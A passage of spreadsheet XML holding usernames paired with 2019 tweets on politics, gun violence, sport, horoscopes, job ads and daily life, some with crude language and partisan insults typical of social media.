    <t>@rushanicus Yes, sir! 😉 We are convinced that a great alternative, or better an evolutionary step in #PeerReview development, is #Open Post-Publication Peer-Review. It ensures a transparent and fair feedback which benefits all the parties!</t>
  </si>
  <si>
    <t>USATODAYmoney</t>
  </si>
  <si>
    <t>Imagine getting a massage on your own private island overlooking the ocean. All of this is yours at a VR spa, even if only for 30 minutes at a time. https://t.co/JJ6JK8i5sR</t>
  </si>
  <si>
    <t>nxcare</t>
  </si>
  <si>
    <t>@LahmamHamza Hi Hamza. Having checking our payment system I can only see two bookings made, EUWM5394 and EUWM5484. I;ve sent both these bookings once more to email address.</t>
  </si>
  <si>
    <t>LFCTammy</t>
  </si>
  <si>
    <t>Happy #BrightonPride2019 to everyone going including a few of my mates. Enjoy @kylieminogue tonight #loveislove #Pride2019 https://t.co/bEKQzXYiBK</t>
  </si>
  <si>
    <t>will_cherie</t>
  </si>
  <si>
    <t>@trickyricci @padremambo @McCormickProf I’m not a dude but whatever. It was worth every second &amp; I didn’t feel like a slave. I’d go through it again a million times for my babies. I dream about being able to hold them again. My youngest will be 16 soon. My oldest has my 5 grandchildren but they don’t live close.</t>
  </si>
  <si>
    <t>sahilkapur</t>
  </si>
  <si>
    <t>Congressional Hispanic Caucus Chair @JoaquinCastrotx on Texas shooting: “The language in the shooter’s manifesto is consistent with President Donald Trump’s description of Hispanic immigrants as ‘invaders.’ Today's shooting is a stark reminder of the dangers of such rhetoric.” https://t.co/CPBXoD58j7</t>
  </si>
  <si>
    <t>becauseisaidso</t>
  </si>
  <si>
    <t>@Canadian_Errant We had the metric system in the 70s. Get a portable fridge thermometer at the hardware store so you can check it for accuracy. It’ll cost about ten bucks.</t>
  </si>
  <si>
    <t>talonterror</t>
  </si>
  <si>
    <t>@JWonggg @PlayTeppen Thank you for this. I've been playing Morrigan all wrong. The only card I'm missing is devil trigger so I'm grinding for that. I put in dark libido morrigan for the time being 👍</t>
  </si>
  <si>
    <t>WordMorris</t>
  </si>
  <si>
    <t>@ExorcistBishop - sorry to insert myself into all of this talk about witches on your feed. I just feel like I’ve been summoned!</t>
  </si>
  <si>
    <t>laura_stietz</t>
  </si>
  <si>
    <t>@Freedomrings22 Good grief, liberals are truly sick and deranged people. I do not wish a painful death on anyone. Then liberals wonder why they lost in 2016 and will lose again in 2020</t>
  </si>
  <si>
    <t>Antndecfandom</t>
  </si>
  <si>
    <t>Photographer #rorylewis took these incredible pics of @antanddec and said this about working with the boys thank you for your amazing work https://t.co/t31b09xXDK</t>
  </si>
  <si>
    <t>PamelaaRenee</t>
  </si>
  <si>
    <t>@BestFights30 Damn that was a good fight! Now get up shake hands and go to 3rd period.</t>
  </si>
  <si>
    <t>mostlyyalit</t>
  </si>
  <si>
    <t>@nickofthebooks I LOVED the romance. Grumpy newspaper boy = my kind of guy.</t>
  </si>
  <si>
    <t>iyagovos</t>
  </si>
  <si>
    <t>@MrPope you can't put this on the internet and not show us.</t>
  </si>
  <si>
    <t>GratefulKeg</t>
  </si>
  <si>
    <t>@TweetlessDew Buddy. It’s the internet we can get anything. https://t.co/hTpdNhK5nq https://t.co/3G9w6npeAi</t>
  </si>
  <si>
    <t>konshelle2012</t>
  </si>
  <si>
    <t>Remain calm and confidential in all your communications today.... More for Gemini https://t.co/yGDJitoMmT</t>
  </si>
  <si>
    <t>Petersonian33</t>
  </si>
  <si>
    <t>@_Montana_Bound_ @Riskographer2 Knee jerk response to learning this was going on. Just read it.</t>
  </si>
  <si>
    <t>o0Valadar0o</t>
  </si>
  <si>
    <t>So, I bought a pricey thing. It will allow me to make more things. Things. https://t.co/R5BFwD6U6S</t>
  </si>
  <si>
    <t>danicarome</t>
  </si>
  <si>
    <t>@TalbertSwan What in the HOLY HELL?!! Fire these officers immediately! 😠</t>
  </si>
  <si>
    <t>WUCFTV</t>
  </si>
  <si>
    <t>This week on #NewsNight: How is Florida’s agriculture industry receiving President Trump’s renegotiated trade deal with Mexico and Canada? Also, the panelists examine the efforts to increase Florida’s minimum wage. Join @NAlvarezWFTV, Friday night at 8:30 on WUCF. https://t.co/pDjlnOeN5R</t>
  </si>
  <si>
    <t>fullywully</t>
  </si>
  <si>
    <t>@jam_masterj21 @STVNews Are you saying “well done” to the solicitor that fought and won this case or Celtic fc ? It surely can’t be Celtic as they’ve fought paying compensation or taking any blame since the start.</t>
  </si>
  <si>
    <t>elsewards</t>
  </si>
  <si>
    <t>@natalie_eilbert Adding it to my personal list of lost positives.</t>
  </si>
  <si>
    <t>leiasiaaaaaa</t>
  </si>
  <si>
    <t>Mfers stay lying and wonder why they never get a text back</t>
  </si>
  <si>
    <t>Abigail_boydxx</t>
  </si>
  <si>
    <t>What’s happened to ‘girl code’ 🤷🏻‍♀️ you don’t have sex with your best friends ex let alone their actual boyfriend, sort yourself out</t>
  </si>
  <si>
    <t>TheSalsaGuy</t>
  </si>
  <si>
    <t>Me "How was the Stupid Hot?" "I can definitely feel you inside of me."</t>
  </si>
  <si>
    <t>iHarvye</t>
  </si>
  <si>
    <t>For me, the greatest. https://t.co/cTwhhfd8Ev</t>
  </si>
  <si>
    <t>thickatnite</t>
  </si>
  <si>
    <t>I turned 18 just in time to vote for Obama and I knew that day the universe was rooting for me. I felt like I was saving the world, lil ole me.. I hope some of y’all get to feel that too. I’m very proud to be the generation to say “fuck your border wall, we lovin hard over here.”</t>
  </si>
  <si>
    <t>biancaxeg</t>
  </si>
  <si>
    <t>Any Twitter friends ever been to Comic-Con (San Diego)? Should I even consider going or how high is the chance that there will be mass shooting?</t>
  </si>
  <si>
    <t>_SteveJarvis_</t>
  </si>
  <si>
    <t>Spent the afternoon in the #TVStudio @GlyndwrUni with a very long pole sticking @mo_sysLab 'stars' to the ceiling ready for a spot of camera tracking #startracker #UE4 #vfx #greenscreen #virtualproduction #clearing2019 #clearing #wales #constellations #cameratracking #realtimeVFX https://t.co/WWcO9T5Y5w</t>
  </si>
  <si>
    <t>barker_jackson</t>
  </si>
  <si>
    <t>I need time to breathe and have a break somewhere just escape because I need to just have time with other peeps — feeling drained</t>
  </si>
  <si>
    <t>nsim15</t>
  </si>
  <si>
    <t>Hey @Cardinals tell Mo for the second straight time since the deadline Wheeler has thrown 7+ shutout innings..</t>
  </si>
  <si>
    <t>TomthunkitsMind</t>
  </si>
  <si>
    <t>‘People heal when there is some deep truth telling.’ — Watch (at)marwilliamson fiercely defended her ambitious plan to pay reparations to African Americans #DemDebate https://t.co/IqdqyJFOnj</t>
  </si>
  <si>
    <t>_Arabian_</t>
  </si>
  <si>
    <t>@fashionedxfaith @FitLissy 😂😂😂 yessss nephew. I need to come visit before he forgets who I am. Twin, I’m sending you healing energy. Drink some ACV. Do you have cough drops? Boil some herbal tea and drop a cough drop in it.</t>
  </si>
  <si>
    <t>TytusHOF</t>
  </si>
  <si>
    <t>@DFVeintitress @DoctorrWill @getlikegage -Once outside the mall b4 practice -When you had me pick bro bro up -Everytime I’ve ever slap boxed you</t>
  </si>
  <si>
    <t>big74dawg</t>
  </si>
  <si>
    <t>@SykesCharlie 4) Feel sorry for his partner</t>
  </si>
  <si>
    <t>EIiBaptiste</t>
  </si>
  <si>
    <t>@BaltBaptiste / Aw, meanie. I want to say hi to Hope too.</t>
  </si>
  <si>
    <t>MineerBrett</t>
  </si>
  <si>
    <t>@JoshuaKnaak @JarrettBellini Good thing he didn’t have a spine to break...</t>
  </si>
  <si>
    <t>Spencerr24</t>
  </si>
  <si>
    <t>@CRobb15 👎🏼 QB1 quits on my football team two weeks before the season and I can’t boo him? When can I boo?</t>
  </si>
  <si>
    <t>ChrisMAGA2020</t>
  </si>
  <si>
    <t>@sairasameerarao Your right I'd doesn't there is just racism and honey your a fucking racist! Your tweets are pathological and are based solely on your racist beliefs and no facts or anything to back up your accusations. You are a race baiter the worst king of racist.</t>
  </si>
  <si>
    <t>balmut_</t>
  </si>
  <si>
    <t>@jordizzle What a weird way to spell Banana.</t>
  </si>
  <si>
    <t>minniebabie003</t>
  </si>
  <si>
    <t>You are on the fast track to a brilliant new contract or busin... More for Aquarius https://t.co/12X6XbdKBb</t>
  </si>
  <si>
    <t>PWLHitFactory</t>
  </si>
  <si>
    <t>30 years ago this week @kylieminogue was at Number 2 in the UK charts with this... https://t.co/xPrCXqfAdz</t>
  </si>
  <si>
    <t>TheFuture5000</t>
  </si>
  <si>
    <t>Just got my life coach certification. I specialize in wealthy women with ennui and teenage boys struggling with fortnite.</t>
  </si>
  <si>
    <t>thejoshcrain</t>
  </si>
  <si>
    <t>@bencox34 It’s good to see your Twitter bot is up and running!</t>
  </si>
  <si>
    <t>aintthtashame</t>
  </si>
  <si>
    <t>Horny on the tl 2k19</t>
  </si>
  <si>
    <t>phil_lerious</t>
  </si>
  <si>
    <t>@JamesDBeall1 Don't know if Bernie himself actually believes this is true, but he certainly wants everyone else to believe it.</t>
  </si>
  <si>
    <t>5tephanje</t>
  </si>
  <si>
    <t>So thankful for my college friends https://t.co/dkQYScFU7p</t>
  </si>
  <si>
    <t>steveroylecomic</t>
  </si>
  <si>
    <t>For those who want to know, my eldest passed all her GCSE’s and even beat my grades. But, she still can’t juggle or balance a ball on her head so I still win!!! I am immensely proud though 🤪</t>
  </si>
  <si>
    <t>Frank71858604</t>
  </si>
  <si>
    <t>@robreiner What is it going to take to get through your meathead that no one believes you. Go make movies. The masses need entertainment while they wait to vote for Trump again</t>
  </si>
  <si>
    <t>Jtrev14</t>
  </si>
  <si>
    <t>@HerndonGearis Which dorm is he going to be in? And yes definitely, what day will you be getting there? I’m in the green house</t>
  </si>
  <si>
    <t>Rdzabbs</t>
  </si>
  <si>
    <t>Now I’m up all of a sudden 🤫</t>
  </si>
  <si>
    <t>Newsenm</t>
  </si>
  <si>
    <t>SEATTLE — EBay has accused three Amazon managers of illegally conspiring to poach its sellers, escalating a monthslong feud between two of the country’s largest e-commerce companies. #AmazoncomInc #AntitrustLawsandCompetitionIssues #ComputersandtheIntern https://t.co/jb3TlXRJXK</t>
  </si>
  <si>
    <t>global_1st</t>
  </si>
  <si>
    <t>@SimsLifeBlog @TheBrickCastle @xgenvr Ha-ha! Do it! I went on a VR game not long ago - so realistic. I nearly got eaten by a shark (I might have fallen off the sofa ha-ha) - Rebecca x</t>
  </si>
  <si>
    <t>Ashton_Addison_</t>
  </si>
  <si>
    <t>@AmanKalra_ @BankToTheFuture @SimonDixonTwitt @CryptoCoinShow Thanks @AmanKalra_ ! @BankToTheFuture with many promising equity plays currently, props to them!</t>
  </si>
  <si>
    <t>_nikkvdeshay_</t>
  </si>
  <si>
    <t>The moment I have to question someone’s character is the moment I should no longer want any dealings with them.</t>
  </si>
  <si>
    <t>CK_1973</t>
  </si>
  <si>
    <t>@Tlove1313 I hope you're right but if they could get him for a 4th I wouldn't hate it either.</t>
  </si>
  <si>
    <t>maxduchaine</t>
  </si>
  <si>
    <t>@TheNatidude And now he will have the experience of both.</t>
  </si>
  <si>
    <t>scribblesonnapk</t>
  </si>
  <si>
    <t>@Chris_Gammell Just because you got onto a plane doesn't mean you gave up your right to free speech. Hack a way.</t>
  </si>
  <si>
    <t>LyfeWithLena</t>
  </si>
  <si>
    <t>I’ve seen Tito’s way too often lately lmao is this a sign I need to hop back on that wave</t>
  </si>
  <si>
    <t>mariamtifada</t>
  </si>
  <si>
    <t>@Arsalanism @damuskus_ LOOOL I'm pretty sure that majlis is in your head and very arbitrary. And who hurt you to demote them that many levels 😂</t>
  </si>
  <si>
    <t>MargaretY1234</t>
  </si>
  <si>
    <t>@960Sonia @davidcaruso1 @SelleyJanet @Belma24071976 @NMastraci @RdcFan @BamaTXAggie @RETACRIS @SandraA38693733 @ArmandaGelsomin @mariadeluz23 @robby4070 @samiii_78 @CarolHollandLV @mapyr1 @FlipRuth @NadiaGiovini @BartolottaStefa @florencedu6259 @ktboldy @kimbird8 @BegoaLabrador2 @Barbara032908 @EpsilonCMa Thank you, Sonia, for a wonderful smile from Horatio on a beautiful sunny day. Friday pretty good so far for me. I hope it is good for all of you.😊</t>
  </si>
  <si>
    <t>Vamosgirl1</t>
  </si>
  <si>
    <t>@TennisTV @karenkhachanov Congrats KK..💕🙌😍 Ban the loser ASAP!!</t>
  </si>
  <si>
    <t>pjmooney</t>
  </si>
  <si>
    <t>Read my Aug 7 Newsletter featuring “How Trump eased access to guns” https://t.co/xDKyhxRaAj</t>
  </si>
  <si>
    <t>ryansongalia</t>
  </si>
  <si>
    <t>@Grzegorz_Wnuk Yes, because one cannot paint with broad strokes, for instance, gay pride is an expression of liberation and acceptance of a traditionally oppressed sexual minority. “Far left” authoritarian and communist groups don’t exist in America, US left groups are mainly social libertarian</t>
  </si>
  <si>
    <t>2351onthelist</t>
  </si>
  <si>
    <t>@peterkane9 @thebordercairn Because the UK’s deficit is now very, very low.</t>
  </si>
  <si>
    <t>rosephilopator</t>
  </si>
  <si>
    <t>Imagine looking at that and thinking “that didn’t happen” rather than re examining what you know</t>
  </si>
  <si>
    <t>kimsanity66</t>
  </si>
  <si>
    <t>@pulte Debtors should get financial training and pay it off. Financial Peace University is a great place to start. @DaveRamsey</t>
  </si>
  <si>
    <t>susieztrans</t>
  </si>
  <si>
    <t>@TheDemCoalition @FoxNews @TuckerCarlson Why hasn’t he been fired yet? How is any of this “fair and balanced”?</t>
  </si>
  <si>
    <t>NZucco80</t>
  </si>
  <si>
    <t>@marianazapata_ I just read some of the comments about your writing and, WOW! As an editor, author, and prof, DON’T LISTEN TO THEM! Your sentences are not overly complicated, and the structure of the book is epic. Let them hate and you just keep growing and do you❤️</t>
  </si>
  <si>
    <t>Superman_Blink</t>
  </si>
  <si>
    <t>If she can criticize then so can we. Everyone message her on insta and tell her to apologise for making such a crappy video. Please don’t get disrespectful or rude. Get your message across without giving her a reason to hate on us even more. https://t.co/irDSSgC1h3</t>
  </si>
  <si>
    <t>BenRead81</t>
  </si>
  <si>
    <t>@bennytweets_ thanks for liking my boy’s picture tonight Benny you made his night! All the best in getting over your injury we’ll miss you out there!</t>
  </si>
  <si>
    <t>marceyplay</t>
  </si>
  <si>
    <t>@Canadas_team @BreitbartNews they are not military grade for one. i dont like bump stocks for another. but its a gimmick you can do with any semi auto rifle.</t>
  </si>
  <si>
    <t>SummerBreakSoap</t>
  </si>
  <si>
    <t>September 7th is the date! You'll be able to pick up Homecoming (lavender, black pepper, neroli, coriander, vetiver, and cedar) and Back to School (hay bales, leaves, dirt, and cedar) from maggardrazors or our… https://t.co/OXkevNZvMa</t>
  </si>
  <si>
    <t>BambieMilan</t>
  </si>
  <si>
    <t>Ladies I have openings available this week after 3pm (morning slots are booked) Text to get your appointment made !! : : Text 562.521.6886 and get #MilanLashed @ Lakewood, California https://t.co/TjU0sQIkjJ</t>
  </si>
  <si>
    <t>cdwood_wood</t>
  </si>
  <si>
    <t>10 of 11 of Ty Jordan’s CB’s are for the #Longhorns . Hopefully he’ll commit soon. #HookEm 🤘🏽🐂</t>
  </si>
  <si>
    <t>bmcjones</t>
  </si>
  <si>
    <t>Congressman John Lewis to Receive Thurgood Marshall Award From American Bar Association - https://t.co/Y4hnVRoWGg</t>
  </si>
  <si>
    <t>AlPackerFordwpb</t>
  </si>
  <si>
    <t>For those in search of the toughest of them all, the Tremor Off-Road Package for the 2020 Ford F-Series Super Duty answers the call. https://t.co/y1gf3x43xu https://t.co/anautFnRT2</t>
  </si>
  <si>
    <t>jlalissa</t>
  </si>
  <si>
    <t>OMGLZIDOZKD I WAS THIS👌🏻CLOSE TO THROW UPAPNSJDKZKD #PeakyBlinders</t>
  </si>
  <si>
    <t>rosebudswiftie</t>
  </si>
  <si>
    <t>@TweeterbugKayla Ah yeah that’s true! Yeah we don’t need you to get attacked🤣</t>
  </si>
  <si>
    <t>Flailmorpho_</t>
  </si>
  <si>
    <t>@Beastmez @JournalistEW @NBCNews this is the only country where this shit happens</t>
  </si>
  <si>
    <t>kennethmlathers</t>
  </si>
  <si>
    <t>@tonyposnanski @realDonaldTrump Fake news cnn is looking for highly uneducated ppl like you. Give em a call bro</t>
  </si>
  <si>
    <t>KiersTheivam</t>
  </si>
  <si>
    <t>Header from Renard does turn out to be the winner. Result disappointing for Atleti, but the performance was not. They played some really good stuff and carved Lyon open a few times. French side did what they had to but will have to be better in the final. #iccwomen</t>
  </si>
  <si>
    <t>BagInABed</t>
  </si>
  <si>
    <t>Enter like me for a chance to win a $450 Grand Prize - #HOOVERONEPWR #hoovercleanup #onthehousewiththecareybrothers #ONEPWR @Hoover https://t.co/cUmpNCaDJ5</t>
  </si>
  <si>
    <t>JoJoFromJerz</t>
  </si>
  <si>
    <t>It was filled to the brim. And there were many. Feels like a metaphor... https://t.co/yBPJov0Uii</t>
  </si>
  <si>
    <t>ThunderrBuddy10</t>
  </si>
  <si>
    <t>Whole lotta ghost orders on supreme but about 1/5 stuck so solid 1k plus day. Not bad for sitting in class lol</t>
  </si>
  <si>
    <t>LouisDonoghue</t>
  </si>
  <si>
    <t>Just think that there’s people out there that don’t know how to make a cup of tea properly though</t>
  </si>
  <si>
    <t>BroodingAtNight</t>
  </si>
  <si>
    <t>@TitaniaMcGrath What about racial as well? Ashamed you didn't teach him about the racial inequality as well.</t>
  </si>
  <si>
    <t>NathanAzalean</t>
  </si>
  <si>
    <t>It’s cute but lacks originality and clout chasing City Girls... using JTs Act Up vocals hmmmm https://t.co/EQT3iHJFJQ</t>
  </si>
  <si>
    <t>RelocationSupp1</t>
  </si>
  <si>
    <t>ON THIS DAY: 22/08 1485 - Richard III became the last English monarch to die in battle 1779 - James Cook landed on New South Wales 1962 - Composer, Claude Debussy was born 1945 - Ho Chi Minh lead a successful coup in Vietnam #onthisday #otd</t>
  </si>
  <si>
    <t>kinzikinsler</t>
  </si>
  <si>
    <t>Just went to park by the river walk and two people offered us their parking passes because they were leaving. I fucking love Texas.</t>
  </si>
  <si>
    <t>DarkDesperado7</t>
  </si>
  <si>
    <t>@shannonrwatts So 'Muricans are OK with schoolchildren being shot and training our furry friends for suicide missions as long as "no one takes muh' guns!" #AmericaIsDead</t>
  </si>
  <si>
    <t>dmbdmg</t>
  </si>
  <si>
    <t>@BTierneyWSAZ I’m pretty sure telling a 3 year old not to touch a gun isn’t the best way to keep them from touching a gun. Much better not to have guns in the house with children.</t>
  </si>
  <si>
    <t>primitiverace</t>
  </si>
  <si>
    <t>@douglasesper Manning won a Super Bowl for the Broncos. So suck on that, Bickerson! 😂</t>
  </si>
  <si>
    <t>BJ_Lancaster</t>
  </si>
  <si>
    <t>@JohnBoo85608696 As he's lived and worked in the country as a medical practitioner for 2 decades I suspect he might well have qualified for citizenship and be able to pay his £5000 deposit. I'm concerned you may have found a legal loophole though and Swinson should be worried for Wera Hobhouse 🤦</t>
  </si>
  <si>
    <t>Julian3597</t>
  </si>
  <si>
    <t>“Free all my niggas stuck in a box locked up and watching the clock”</t>
  </si>
  <si>
    <t>dterracino</t>
  </si>
  <si>
    <t>The point is: @Xbox will continue allowing companies to require access to your info without published terms on @MicrosoftStore, and @Apple will continue pushing #app #subscriptions in the @AppStore. And the sad thing is, no one seems to care.</t>
  </si>
  <si>
    <t>comradeoglivy</t>
  </si>
  <si>
    <t>At 27 I've purchased and worn my first rain jacket. I can see why people use them. At this rate I'll own an umbrella soon</t>
  </si>
  <si>
    <t>MOD3L4m3</t>
  </si>
  <si>
    <t>Your charitable spirit is noble, but keep your wits about you.... More for Libra https://t.co/YLcejgvnUY</t>
  </si>
  <si>
    <t>_nikobae</t>
  </si>
  <si>
    <t>Oh we love waking up in a panic in the middle of the night</t>
  </si>
  <si>
    <t>diablitajodia</t>
  </si>
  <si>
    <t>you don’t know, what you do to me</t>
  </si>
  <si>
    <t>JillPyeatt</t>
  </si>
  <si>
    <t>Gained 8 followers and lost 8 (stats by https://t.co/u6Qk1bj1A0)</t>
  </si>
  <si>
    <t>LGBTQVoter</t>
  </si>
  <si>
    <t>@atrupar @DanPatrick Trying to convince us it’s the digital guns and not the real ones? Sounds like something a gun lobbyist would say.</t>
  </si>
  <si>
    <t>WTGSFOX28</t>
  </si>
  <si>
    <t>SC Rep. Cunningham names campaign manager for 2020 re-election campaign https://t.co/nOzVwQRqyV</t>
  </si>
  <si>
    <t>JJ_AZ_Realtor</t>
  </si>
  <si>
    <t>New Listing! 4 bed | 4 bath | 3417 sq. ft. - Priced at $615,000 Magnificent Mountain side home with 4 car garage! Inviting Entry greets you to light and airy floor plan with vaulted... - https://t.co/O3MncKMQZ9 https://t.co/iahVvyvtLM</t>
  </si>
  <si>
    <t>zigmund_floyd</t>
  </si>
  <si>
    <t>So essentially Jon Voight in real life is as much of a piece of shit as the character he portrays on Ray Donovan. #RayDonovan</t>
  </si>
  <si>
    <t>sonakshishishi</t>
  </si>
  <si>
    <t>I texted my mom to tell her about my patient tomorrow and how I have to give most of his meds via injection and my mom literally says “that’s so rude” Ok, I’ll just stop doing my job so I can be a nice ass bitch mother 😂</t>
  </si>
  <si>
    <t>nschumacher10</t>
  </si>
  <si>
    <t>@Harold_Steves @MJvizuals @Minumuss @bob_fedderly @bchydro @CDHoweInstitute @bcndp @christyclarkbc @jjhorgan how about all the vast amounts of GHG that your grain fed beef is producing? you don't give s**t about the environment, you just want to show boat. https://t.co/C8N28K0FJt where is your 10,000 years? PLEASE STOP SPREADING DISINGENUOUS INFORMATION. First 2.5c/kwh solar... https://t.co/SbvPuFEoWv</t>
  </si>
  <si>
    <t>1DJTBOYGOLD</t>
  </si>
  <si>
    <t>#keepitlocked N/P: Young Wun - Tear It Up https://t.co/dAy9ruixOF</t>
  </si>
  <si>
    <t>DrTC_allan</t>
  </si>
  <si>
    <t>@ProfWetpaint Me too - shelling and cooking. Then serve with mint</t>
  </si>
  <si>
    <t>LLaMattina</t>
  </si>
  <si>
    <t>is hiring a 100% remote Technical Scripting Engineer who is familiar with OpenVMS and Windows OS working on a Linux platform and has experience with Centricity Business Software. This is a long-term consulting position.</t>
  </si>
  <si>
    <t>PhillipNakov</t>
  </si>
  <si>
    <t>I am so excited to be going back to the Hollywood Bowl 8/23 to see my favorite band in the whole world… PINK MARTINI! Featuring the incomparable and divine China Forbes! Let me know if you are also... https://t.co/ZBR6v3isb3</t>
  </si>
  <si>
    <t>WolfOsha</t>
  </si>
  <si>
    <t>The decentralization of this platform. I ain't talking shit but this is what I was just told. Last I knew US didn't have regulations on Crypto.</t>
  </si>
  <si>
    <t>LisaOFScotts</t>
  </si>
  <si>
    <t>@myfacehunter @fashinsider2 She's gorge but her legs🤔too tight at where it dropped wrong fabric 4 body type. Hair &amp; make up 💯</t>
  </si>
  <si>
    <t>BradBradsavant</t>
  </si>
  <si>
    <t>@hunter6_leger @PWarhorse Nah you lucky. We’d have to carry you home 😛</t>
  </si>
  <si>
    <t>RICKMORRIS3</t>
  </si>
  <si>
    <t>@SENBreakfast Ratugolea did play ruck for @MurrayBushiesFC</t>
  </si>
  <si>
    <t>SantaBarbaraGig</t>
  </si>
  <si>
    <t>Goleta CA USA - Electromechanical Technician - We are currently hiring for an Electromechanical Tech: We are currently hiring for an Electromechanical Technician position in the Goleta area. This ... Records and interprets https://t.co/dJYpcvgPRL</t>
  </si>
  <si>
    <t>BlayneKyle</t>
  </si>
  <si>
    <t>@GuacamoleyTweet @GeorgeTakei If you're THAT insecure in your masculinity, just hand in your fucking "Man" card. @brielarson was superb as Captain Marvel and I cannot WAIT for Natalie Portman's Jane Foster Thor! Go flex your muscles in the mirror; the only person that cares is right in front of you!</t>
  </si>
  <si>
    <t>nurserenee_rn</t>
  </si>
  <si>
    <t>@AC360 This interview was incredible. Well @AC360 and Mr. Park. You spoke eloquently about your experience. Appreciate it as my own son gave up his hope of career as FSO because of how screwed up we’ve become.</t>
  </si>
  <si>
    <t>_joshlyn_</t>
  </si>
  <si>
    <t>i need to get toned</t>
  </si>
  <si>
    <t>Lady_Sarcasm94</t>
  </si>
  <si>
    <t>The urge to go to Hobby Lobby is rising, I want all the things!</t>
  </si>
  <si>
    <t>Vasmeth</t>
  </si>
  <si>
    <t>@BearlyFeline @SkiaSkai Mr sandman, Bring me a cat, Make it the cutest That I've ever pat.</t>
  </si>
  <si>
    <t>dmich</t>
  </si>
  <si>
    <t>@michifman I knew it. Two years before he was pounding on the door of Granny's church to tell Isbister to stop playing the organ and get moving. Didn't quite work out tho...</t>
  </si>
  <si>
    <t>SeltzerKimberly</t>
  </si>
  <si>
    <t>I gave my best advice and secrets on body language to @EliteSingles! You're going to want to read this... https://t.co/YP57TmA50i https://t.co/7AWi74Jz23</t>
  </si>
  <si>
    <t>manduhmurdah</t>
  </si>
  <si>
    <t>@chrisdelia And just when you think Daddy couldn't get any hotter...</t>
  </si>
  <si>
    <t>anthonypfarda</t>
  </si>
  <si>
    <t>@TwinklingTania @Noodoggy Hate is a mental illness. Mentally stable people do not walk into a public place and start shooting people. Americans had easier access to guns in the 50s and 60s and yet we didn't see daily mass shootings. How has our society changed?</t>
  </si>
  <si>
    <t>vodkasnowflake</t>
  </si>
  <si>
    <t>@Millerheighife i need to meet the person that made this. i want to shake their hand.</t>
  </si>
  <si>
    <t>R_Ty3304</t>
  </si>
  <si>
    <t>@BenFoottit @labourpress @jeremycorbyn Agreed. To really level the playing field, there needs to be a tax on online retailers as those with shops etc just can't compete. Or lower business rates substantially but that'll take money away from services etc.</t>
  </si>
  <si>
    <t>acatt1497</t>
  </si>
  <si>
    <t>I’m just going to drink the 5 bottles of wine currently in the house in an attempt to somehow get through this. RIP my liver if it’s still alive anyway</t>
  </si>
  <si>
    <t>fromdialsquare</t>
  </si>
  <si>
    <t>@MinasNathan99 Emile Smith Rowe, Saka and Nelson all much more preferable than Fraser to replace Mikhitarian but obviously just my opinion</t>
  </si>
  <si>
    <t>sakinaham88</t>
  </si>
  <si>
    <t>Anyone want to discuss the new Dave Chappelle special??? https://t.co/NPEM0wh7WL</t>
  </si>
  <si>
    <t>Cammiluna</t>
  </si>
  <si>
    <t>Lunch break trip to @Blick_Art! Got some final things for the trip. I was gonna pack the bad watercolor sketchbook just to finish it, but I'm tired of struggling with it. Also, this book has regular sketchbook paper mixed in so its a 2-in-one! New journal too I love Fabrianos! https://t.co/BO2GDEgT7d</t>
  </si>
  <si>
    <t>MsSBurns</t>
  </si>
  <si>
    <t>I've just shared a more in depth review on my IG but these books from @NosyCrow are brilliant. Daniel is really into his history at the moment and is devouring these @chaestrathie https://t.co/mUoh9ecfx6</t>
  </si>
  <si>
    <t>AmbitiousBonnie</t>
  </si>
  <si>
    <t>@theyyylovetyler Girl idk. They’re the same thing i think. 😂</t>
  </si>
  <si>
    <t>TRACK ALERT : At Tue Aug 6 12:18:16 2019 #TUA934 from IST (1382nm) to KRW (280nm) has geo track of 297 but is heading 139 diff of 158 #AvGeek #Diversion https://t.co/MFcVs2DjWW https://t.co/hjkhRpJmo4</t>
  </si>
  <si>
    <t>PhoenixGaming_0</t>
  </si>
  <si>
    <t>@Yang4M @ahennessysister @DaleBrill @Mjoubert5 @AndrewYang Contrary to popular belief, us conservatives are not heartless and unfeeling. We don't like people getting deported. We know it isn't fun. We just also know laws are meant to be followed and we can't just make exceptions all the time</t>
  </si>
  <si>
    <t>palomacreative</t>
  </si>
  <si>
    <t>@DearAuntCrabby No vacations 😡Hell they get pay from us and Russia .</t>
  </si>
  <si>
    <t>Marz__Cat</t>
  </si>
  <si>
    <t>I’m so comfortable with my roommates that I could literally drop acid with them and vibe in everyone’s room 😭❤️ that’s my mutha fuckin family right there 🚫💯 idk what I’d do without us living together and helping each other 🙏🏻</t>
  </si>
  <si>
    <t>TimHarcourt</t>
  </si>
  <si>
    <t>@ki_sekiya Suntory whisky 🥃 is very good by the way</t>
  </si>
  <si>
    <t>kdmcstl</t>
  </si>
  <si>
    <t>@AuraSoFarGone Shit is amazing and has so many good benefits. Slaps even better when you're smacked.</t>
  </si>
  <si>
    <t>pharrellthegoat</t>
  </si>
  <si>
    <t>Am I in the camp that says Eli Apple pelted adequate coverage and Adam made a great catch?</t>
  </si>
  <si>
    <t>Craig_Rasmussen</t>
  </si>
  <si>
    <t>@ctlnmcfall @CBP @YouTube I think you should be demonized for caging children . . .</t>
  </si>
  <si>
    <t>jpan1982</t>
  </si>
  <si>
    <t>@Super70sSports This is what I would use a time machine for</t>
  </si>
  <si>
    <t>_CWill1</t>
  </si>
  <si>
    <t>@KylerTheKing @Blake51J Lmao idc I said I WANT not the people. As long as it’s not da baby or stunna im fine lol</t>
  </si>
  <si>
    <t>discoverykid_</t>
  </si>
  <si>
    <t>@9katfish9 @stephhhaniaa yeah! and they're do cheap , like $2 for 2 vegan hot dogs</t>
  </si>
  <si>
    <t>brenmcl</t>
  </si>
  <si>
    <t>Don’t fear those your don’t understand get curious ask questions. Sense and trust yourself you have got this... 🧘‍♂️🥰🙏</t>
  </si>
  <si>
    <t>jennychen8601</t>
  </si>
  <si>
    <t>@melofsometrades Yes would you like to be added to the DM</t>
  </si>
  <si>
    <t>JFr4ser</t>
  </si>
  <si>
    <t>@sociallecturnal @columbascave @LucyHunterB @daphnebroon2 @shonacraven Information that comes to light doesn’t just evaporate. It stays with whoever knows about it even if never shared with anyone else. My maternity record has more information in it than I know - can’t recall all of the detail, didn’t understand some specifics..</t>
  </si>
  <si>
    <t>HubJHU</t>
  </si>
  <si>
    <t>Here it is, the official class picture for the @JohnsHopkins Class of 2023. Zoom in on our hi-res version to see each and every new Blue Jay #JHU2023 💙https://t.co/wfPKojEGeH https://t.co/cxDjTN6OxP</t>
  </si>
  <si>
    <t>bexxhardy</t>
  </si>
  <si>
    <t>It was also such a great opportunity to spend time with @Fishy_Yuu, @aidanreyn and Laury Jasper! A huge thank you to @leic_child_hols for sharing this trip with us. Please give the charity a follow and help support their cause and #LeicestersChildren.</t>
  </si>
  <si>
    <t>Tina5407</t>
  </si>
